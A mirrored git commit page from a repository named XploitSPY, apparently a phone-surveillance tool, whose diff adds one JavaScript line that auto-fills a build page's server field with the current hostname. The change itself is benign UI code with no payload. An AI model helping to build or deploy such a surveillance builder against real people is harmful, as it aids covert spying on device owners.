mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2024-11-14 06:19:19 +08:00
Auto detect hostname
This commit is contained in:
parent
9b7c864d19
commit
86b867d366
@ -65,6 +65,8 @@
|
||||
"Finalizing"
|
||||
];
|
||||
|
||||
document.getElementById('uriInput').value = window.location.hostname;
|
||||
|
||||
var loadingIndex = 0;
|
||||
var isDone = false;
|
||||
$('#gobuild').click((e) => {
|
||||
|
Loading…
Reference in New Issue
Block a user